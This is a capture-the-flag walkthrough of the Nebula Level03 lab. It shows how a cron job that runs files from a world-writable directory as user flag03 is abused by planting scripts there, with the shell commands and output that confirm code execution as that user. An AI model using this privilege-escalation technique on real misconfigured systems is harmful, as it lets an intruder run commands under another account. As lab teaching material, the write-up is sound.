In Level03 we are said that the program on /flag03 is run by cron every X minutes. If we have a look at the code we can see that it will execute the files in the writable.d directory and then remove them:

level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

Ok, so whatever we put in writable.d will be execute by someone else … but who? Lets find out adding this simple script:

level03@nebula:/home/flag03/writable.d$ echo "id > /tmp/id" > getid

After waiting a cuple of minutes we can see that flag03 runs the cron, how convinient!

level03@nebula:/tmp$ cat id
uid=996(flag03) gid=996(flag03) groups=996(flag03)

Now, let make flag03 get the flag for us:

level03@nebula:/home/flag03/writable.d$ echo "getflag > /tmp/flag" > myGetFlag

Wait for it, wait for it … and:

level03@nebula:/tmp$ cat flag
You have successfully executed getflag on a target account